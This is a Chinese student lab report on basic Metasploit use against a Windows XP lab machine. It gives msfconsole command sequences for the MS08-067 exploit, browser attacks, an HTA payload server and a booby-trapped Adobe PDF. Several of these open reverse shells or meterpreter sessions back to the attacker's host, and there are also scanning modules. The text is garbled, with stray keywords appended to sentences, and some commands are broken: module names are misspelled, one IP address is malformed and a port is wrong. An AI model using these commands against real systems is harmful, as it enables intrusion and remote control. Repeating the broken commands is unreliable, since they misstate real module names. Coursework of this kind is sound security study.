2018-2019-2 網絡對抗技術 20165320 Exp5 MSF基礎應用

2018-2019-2 網絡對抗技術 20165320 Exp5 MSF基礎應用

1、實踐內容

  • 本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:shell

  • 一個主動攻擊實踐:MS08-067(成功)windows

  • 一個針對瀏覽器的攻擊:MS10_002_aurora(失敗)、browser_autpwn2(成功)、vm_1漏洞系統BodgeIt(成功且惟一)api

  • 一個針對客戶端的攻擊:adobe_toolbutton(成功)瀏覽器

  • 一個輔助模塊:http_vertion(成功且惟一)、ssh_vertion(成功且惟一)、arp_sweep(成功)安全

### 2、報告內容

基礎問題回答

  • 用本身的話解釋什麼是exploit,payload,encode網絡

    • exploit:MSF的攻擊模塊,它的功能是將payload(有效攻擊載荷)順利傳送到靶機中,分爲主動攻擊和被動攻擊兩種模式。ssh

    • payload:有效攻擊載荷,在靶機中實際執行的一段惡意代碼,做用通常是執行後能與攻擊的主機創建鏈接,實現遠程控制。tcp

    • encode:編碼模塊,可以經過不一樣的編碼方式對payload進行不一樣的編碼,僅改變payload的一些「」
      外貌特徵,不影響其功能學習

      實踐過程

  • 採用的靶機爲:Windows XP SP3編碼

一個主動攻擊:MS08-067安全漏洞(成功)

  • 首先使用nmap -sS -A --script=smb-vuln-ms08-067 -PO 靶機IP地址查看靶機是否存在該漏洞

  • 而後在攻擊機Kali的命令行中輸入msfconsole進入控制檯

  • 選擇ms08-067漏洞 use exploit/windows/smb/ms08_067_netapi

  • 使用show options 查看須要設置的相關參數

  • 設置靶機的IP set RHOSTS 192.168.1.235

  • 選擇有關tcp的反向鏈接的payload generic/shell_reverse_tcp

  • 設置監聽者的IPset LHOST 192.168.1.123

  • 設置監聽的端口號set LPORT 5320

  • 執行攻擊 exploit

一個針對瀏覽器的攻擊: MS10_002_aurora安全漏洞(失敗)、broswer_autpwn2(成功)

  • 按照上個漏洞攻擊一樣的步驟,設置相關參數:

    msfconsole
      use exploit/windows/browser/ms10_002_aurora
      set payload generic/shell_reverse_tcp
      set LHOST 192.168.1.123 //設置kali攻擊IP,
      set RHOST 192.168.1.235
      set SRVPORT 5320
  • 查看相關配置,確認有無差錯

  • 執行exploit,生成一些URL連接

  • 在靶機IE輸入剛剛生成的URL連接,結果出現錯誤

  • Kali端鏈接中斷,攻擊失敗

  • 猜想是瀏覽器在訪問過程當中發生了一些錯誤,中斷了回連的過程,應該是瀏覽器的安全設置問題。

  • 而後嘗試第二次攻擊:

    use auxiliary/server/browser_autopwn2
      set SRVHOST 192.168.56.1
      set URIPATH /test

      exploit
     

  • 使目標瀏覽器訪問http://192.168.1.123/test

  • Kali虛擬機顯示攻擊成功。

  • 第三次攻擊,惟一(vm_1漏洞系統BodgeIt)

    use exploit/windows/misc/hta_server
      set payload windows/shell/reverse_tcp
      set srvport 8888
      set lport 12345
      run

  • 如今切換到Windows虛擬機,打開IE瀏覽器,輸入地址

  • 點擊運行,回連成功

一個針對客戶端的攻擊:adobe_toolbutton安全漏洞(成功)

  • 進入msf模塊,使用adobe_toolbutton進行攻擊,設置相關參數

  • 輸入如下命令,完成配置並建立PDF,打開顯示隱藏文件,並在/root/.msf4/local/目錄下找到20165320.pdf文件,以下圖所示

    use exploit/windows/fileformat/adobe_toolbutton//使用Adobe_toolbutton模塊
      set payload windows/meterpreter/reverse_tcp
      set LHOST 192.168.1.123 //設置kali攻擊IP,
      set LPORT 5320
      set FILENAME 20165320.pdf


  • 將該PDF拷到靶機上

  • 以後進入以前的監聽模塊,依次輸入如下命令設置並監聽便可,輸入exploit後在靶機上打開pdf,回連成功

    use exploit/multi/handler
      set payload windows/meterpreter/reverse_tcp
      set LHOST 192.168.1.123
      set LPORT 5320
      exploit


一個輔助模塊:http_vertion(成功且惟一)、ssh_vertion(成功且惟一)、arp_sweep(成功)

  • 使用http_vertion模塊可以掃描靶機的http版本號

    use auxiliary/scanner/http/http_vertion
      set RHOST 192.168.1.157 
      set THREADS 10
      set RPORT 80
      exploit

  • 使用ssh_vertion模塊可以掃描靶機的ssh版本號

    use auxiliary/scanner/ssh/ssh_vertion
      set RHOST 192.1.235 
      set THREADS 10
      set RPORT 80
      exploit

  • 使用arp_sweep 掃描網段的主機

    use auxiliary/scanner/discovery/arp_sweep 
      set RHOSTS 192.168.1.0/24
      set THREADS 50
      exploit

實踐總結與體會

  • 這一次實驗咱們熟悉了MSF的六大模塊,也弄清楚了它們具體的用法,爲咱們之後的學習打下了必定的基礎,可是也發現了許多操做系統已經修補了之前存在的漏洞,對於咱們這樣的新手來講,找到一個新的漏洞太難。

    離實戰還缺些什麼技術或步驟

  • 主要仍是理想很豐滿,現實很骨感,可以攻擊成功都是在一種理想的狀況下,要想實戰,許多苛刻的條件咱們都無法實現。

相關文章
相關標籤/搜索